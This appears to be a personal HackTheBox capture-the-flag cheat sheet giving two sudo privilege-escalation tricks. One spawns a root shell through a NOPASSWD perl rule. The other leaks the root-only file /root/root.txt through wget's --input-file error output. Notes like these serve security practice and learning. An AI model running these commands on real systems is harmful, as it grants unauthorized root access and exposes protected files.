Chittu13/hackthebox/Privilege.md

 - if you find ```(ALL : ALL) NOPASSWD: /usr/bin/perl``` in ```sudo -l```
   - then use the below command it will give you the root privilege
   - ```sudo perl -e 'exec "/bin/bash";'```

+# easy way to get root/root.txt <a name="root.txt"></a>
+1️⃣ Read the Root Flag Using --input-file:

+Use a root-only file (/root/root.txt) as an input to wget.
+It will try to parse it as a URL, fail, and leak the content (flag) in the error.

+sudo wget --input-file=/root/root.txt